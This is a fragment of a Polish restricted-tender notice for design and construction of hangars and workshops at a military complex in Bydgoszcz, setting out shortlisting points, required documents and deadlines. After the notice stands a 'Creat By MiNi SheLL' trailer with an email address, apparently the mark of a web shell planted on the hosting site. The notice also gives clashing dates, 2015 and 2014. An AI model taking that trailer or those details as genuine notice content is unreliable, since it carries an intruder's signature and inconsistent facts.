<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>1.Zamawiający zaprosi do składania ofert 5 wykonawców, którzy spełniają warunki udziału w postępowaniu.
 2. Jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu, będzie mniejsza niż 5, Zamawiający zaprosi do składania ofert wszystkich wykonawców spełniających te warunki.
 3. Jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu, będzie większa niż 5, Zamawiający zaprosi do złożenia oferty 5 wykonawców, którzy otrzymali najwyższą ilość punktów wg następujących zasad:
1)  Wykonanie w ciągu ostatnich 5 lat pełnobranżowej dokumentacji  w zakresie budowy, rozbudowy lub przebudowy hangaru (położonego na terenie kompleksu wojskowego) o wartości min. 6 mln zł. - 1 pkt za każdą dokumentacje
2)  Wykonanie w ciągu ostatnich 5 lat pełnobranżowej dokumentacji                                 w zakresie budowy, rozbudowy lub przebudowy budynku warsztatowego (położonego na terenie kompleksu wojskowego ) o wartości min. 2  mln zł. - 1 pkt za każdą dokumentacje 
3)  Wykonanie w ciągu ostatnich 5 lat budowy, rozbudowy lub przebudowy hangaru (położonego na terenie kompleksu wojskowego) o wartości min. 6 mln zł. - 5 pkt za każdą wykazaną robotę budowlaną
4)  Wykonanie w ciągu ostatnich 5 lat budowy, rozbudowy lub przebudowy budynku warsztatowego (położonego na terenie kompleksu wojskowego)o wartości min. 2  mln zł.  - 5 pkt za każdą wykonaną robotę budowlaną 
5)  Wykonanie w ciągu ostatnich 5 lat budowy, rozbudowy lub przebudowy budynku użyteczności publicznej (położonego na terenie kompleksu wojskowego ) w systemie zaprojektuj  i wybuduj o wartości min. 10 mln zł.  - 10 pkt za każdą wykonaną robotę budowlaną 
6)  Zrealizowanie w ciągu ostatnich 10  lat robót budowlanych  na terenie  kompleksu wojskowego  -  1 pkt.  za każdą  robotę budowlaną - (max. 6 punktów)
7) Dysponowanie kadrą projektantów  posiadającą upoważnienie do  dostępu 
do informacji niejawnej o klauzuli ZASTRZEŻONE, która bierze lub brała udział 
w budowie inwestycji o wartości min 10 mln zł realizowanej  na kompleksie wojskowym- 0,5 pkt za każdą osobę - max 30 punktów 
8) Dysponowanie kadrą inżynierską  posiadającą upoważnienie do dostępu 
do informacji niejawnej o klauzuli ZASTRZEŻONE, która bierze lub brała udział 
w budowie inwestycji o wartości min. 10 mln zł realizowanej  na kompleksie wojskowym - 0,5 pkt za każdą osobę - max 30 punktów 
9) Dysponowanie pracownikami fizycznymi posiadającymi upoważnienia 
do dostępu do informacji niejawnej o klauzuli ZASTRZEŻONE  - za każde 30 osób wykonawca otrzyma 0,5 pkt. - max 8 punktów 
10) Posiadanie Certyfikatów ISO 91001:2008 i AQAP 2110:2009  -   20 pkt 
Wykonawca do wniosku o dopuszczenie do udziału w postępowaniu załączy wykaz wykonanych robót budowlanych wraz z dokumentami potwierdzającymi, że zostały one wykonane należycie oraz wykaz osób, o których mowa w pkt. 7-9) 
 4. Wykonawca może polegać na wiedzy i doświadczeniu  innych podmiotów, jedynie w celu wykazania spełniania warunków udziału w postępowaniu. Zamawiający nie będzie przyznawał punktów za roboty i usługi wykonane przez podmioty trzecie, na zasoby których Wykonawca się powołuje. Punktacja w danym kryterium wiedzy i doświadczenia będzie przyznawana jedynie wykazanym robotom referencyjnym, wykonanym przez Wykonawcę samodzielnie lub w konsorcjum. Zamawiający informuje,  że będzie stosował art. 26 ust.3 ustawy tylko i wyłącznie w celu umożliwienia wykonawcy wykazania spełniania warunków udziału w postępowaniu. Zamawiający nie przewiduje możliwości uzupełniania dokumentów zawierających informacje uwzględniane do punktacji i tym samym umożliwiające uzyskanie wyższej pozycji w rankingu.
  5. w przypadku gdy dwóch lub więcej wykonawców otrzyma taką samą ilość punktów i zajmą ostatnie równorzędne miejsce a liczba wykonawców przekroczy 5, o miejscu w klasyfikacji decydować będzie zsumowana wartość wszystkich wykazanych zadań w pkt. 3 ppkt 3)</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - gwarancja jakości - 4</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>określone zostaną w projekcie umowy stanowiącym załącznik do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> wzór wniosku umieszczony zostanie na stronie internetowej Zamawiającego<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nie dotyczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2015 godzina 10:00, miejsce: siedziba Zamawiającego, pok. 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Pisemny wniosek o dopuszczenie do udziału w postępowaniu wraz z załączonym oświadczeniem o spełnieniu warunków udziału w postępowaniu, o którym mowa w art. 50 w związku z art.
47 ustawy Prawo zamówień publicznych oraz wszystkimi wymaganymi oświadczeniami i dokumentami
potwierdzającymi spełnienie warunków udziału w postępowaniu oraz warunków dotyczących nie podlegania wykluczeniu z postępowania na podstawie art. 24 ustawy - Prawo zamówień
publicznych, należy złożyć w miejscu wskazanym w sekcji IV.4.4) 
2. Opakowanie powinno być
zaadresowane na adres siedziby Zamawiającego oraz zawierać dopisek : Wniosek o dopuszczenie do udziału w postępowaniu na opracowanie dokumentacji projektowej i wykonanie na jej podstawie robót budowlano-montażowych dla czterech inwestycji realizowanych w Bydgoszczy z dopiskiem nie otwierać przed 08.04.2014 godz. 10:00 
3. Wzory Oświadczeń i inne dokumenty stanowiące załączniki do wniosku w sprawie zakwalifikowania do udziału w postępowaniu przetargowym znajdują się na stronie internetowej zamawiającego. 
4. Wniosek i dokumenty należy złożyć w języku polskim. Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski. 5. Dokumenty mogą być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę, za wyjątkiem pełnomocnictwa i zobowiązań do oddania zasobów na podstawie art. 26 ust. 2b, które muszą być złożone w formie pisemnej
 6. Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do
reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w
sprawie zamówienia publicznego. Dokumenty i oświadczenia dotyczące wykazania braku podstaw do
wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w
art. 24 ust. 1 ustawy publicznego, skladają wszyscy wykonawcy składający ofertę wspólną 7.Zamawiający
będzie porozumiewał się z Wykonawcami pisemnie oraz za pomocą faksu lub drogą elektroniczną)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com